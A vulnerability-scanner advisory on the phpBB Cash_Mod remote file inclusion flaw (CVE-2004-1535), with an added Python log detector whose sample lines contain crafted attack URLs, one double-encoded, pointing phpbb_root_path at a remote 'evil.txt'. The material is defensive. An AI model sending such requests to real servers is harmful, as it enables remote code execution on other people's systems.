Vulnerability ID: 21399
Risk level: 40
Port: 80, ...
Protocol: TCP
Category: CGI

Detailed description:
The phpBB installed on this web server has a remote PHP file inclusion vulnerability in admin_cash.php. phpBB is an open-source bulletin board software package that uses MySQL, MS-SQL, PostgreSQL, Access/ODBC and other databases. Because of a vulnerability in the phpBB Cash_Mod module, phpBB versions 2.0.10 and earlier allow a remote attacker to include malicious PHP files hosted on a third-party server. If the allow_url_fopen and register_globals options are enabled in php.ini, a remote attacker can send a crafted URL request to the admin_cash.php script in which the "phpbb_root_path" variable names a malicious PHP file on a remote system as its argument, causing the target server to include that arbitrary PHP file and execute it on the vulnerable web server.

* Reference sites:
  http://archives.neohapsis.com/archives/bugtraq/2004-11/0235.html
  http://archives.neohapsis.com/archives/bugtraq/2004-11/0252.html
  http://archives.neohapsis.com/archives/bugtraq/2004-11/0238.html
  http://archives.neohapsis.com/archives/bugtraq/2004-11/0227.html
* Affected platforms: phpBB Group, phpBB versions 2.0.10 and earlier; all operating systems, all versions
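As an added example (not part of this advisory or of phpBB), the following Python flags access-log requests that match the pattern described above (admin_cash.php requested with phpbb_root_path pointing at a remote URL, including a double-percent-encoded form) and checks a php.ini fragment for the two preconditions the description names. It assumes an Apache-style combined log format; the log lines, addresses and php.ini fragment are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request part of an Apache-style combined access log line (assumed format).
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample lines (TEST-NET addresses). The first two are RFI attempts;
# the second double-percent-encodes the scheme to slip past naive matching.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Nov/2004:12:00:00 +0000] "GET /phpBB2/admin/admin_cash.php'
    '?phpbb_root_path=http://198.51.100.7/evil.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Nov/2004:12:00:01 +0000] "GET /phpBB2/admin/admin_cash.php'
    '?phpbb_root_path=http%253A%252F%252F198.51.100.7%252Fevil.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Nov/2004:12:00:02 +0000] "GET /phpBB2/admin/admin_cash.php'
    '?mode=config HTTP/1.1" 200 2048',
]
# Constructed php.ini fragment with one of the two advisory preconditions enabled.
SAMPLE_PHP_INI = "; constructed fragment\nallow_url_fopen = On\nregister_globals = Off\n"


def is_rfi_attempt(log_line: str) -> bool:
    """True if the line requests admin_cash.php with phpbb_root_path set to a remote URL."""
    m = LOG_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("admin_cash.php"):
        return False
    # parse_qs decodes percent-encoding once; unquote again so a double-encoded
    # "http%253A%252F%252F..." is still recognised as a remote scheme.
    for value in parse_qs(parts.query, keep_blank_values=True).get("phpbb_root_path", []):
        if unquote(value).strip().lower().startswith(REMOTE_SCHEMES):
            return True
    return False


def enabled_rfi_preconditions(ini_text: str) -> list[str]:
    """Names of the advisory's two php.ini options that are switched on."""
    truthy = {"1", "on", "true", "yes"}
    found = []
    for raw in ini_text.splitlines():
        key, sep, val = raw.split(";", 1)[0].partition("=")  # drop ';' comments
        key, val = key.strip().lower(), val.strip().strip('"').lower()
        if sep and key in ("allow_url_fopen", "register_globals") and val in truthy:
            found.append(key)
    return found
```

Running `is_rfi_attempt` over each line of `SAMPLE_LOG_LINES` flags the first two and not the third; `enabled_rfi_preconditions(SAMPLE_PHP_INI)` reports only allow_url_fopen.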
Solution:
Upgrade to the latest version of phpBB (2.0.11 or later), available from the phpBB web site at http://www.phpbb.com/index.php.

Related URLs:
CVE-2004-1535 (CVE)
11701 (SecurityFocus)
18151 (ISS)